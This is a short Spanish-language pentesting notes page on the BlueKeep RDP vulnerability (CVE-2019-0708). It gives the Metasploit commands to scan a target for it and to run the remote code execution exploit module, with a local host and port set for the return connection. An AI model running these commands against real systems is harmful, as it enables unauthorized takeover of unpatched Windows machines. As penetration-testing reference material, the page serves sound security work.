BlueKeep - Vulnerabilidad RDP

Vulnerabilidad BlueKeep en RDP

BlueKeep (identificada como CVE-2019-0708) es una vulnerabilidad crítica en el Protocolo de Escritorio Remoto (RDP) de Microsoft, permite la ejecución remota de código. Fue descubierta en mayo de 2019 y afecta a varias versiones del sistema operativo Windows, incluyendo Windows 7, Windows Server 2008 R2 y Windows Server 2008.

Comprobación Vulnerable (Metasploit)

Usamos el módulo : auxiliary/scanner/rdp/cve_2019_0708_bluekeep

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOST <IP>
run

Explotación con Metasploit

Usamos el módulo: exploit/windows/rdp/cve_2019_0708_bluekeep_rce

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <IP>
set LHOST <Local IP>
set LPORT <Local port>
show targets
set target <0-8>
exploit

Última actualización hace 1 año

hashtagComprobación Vulnerable (Metasploit)

hashtagExplotación con Metasploit

Comprobación Vulnerable (Metasploit)

Explotación con Metasploit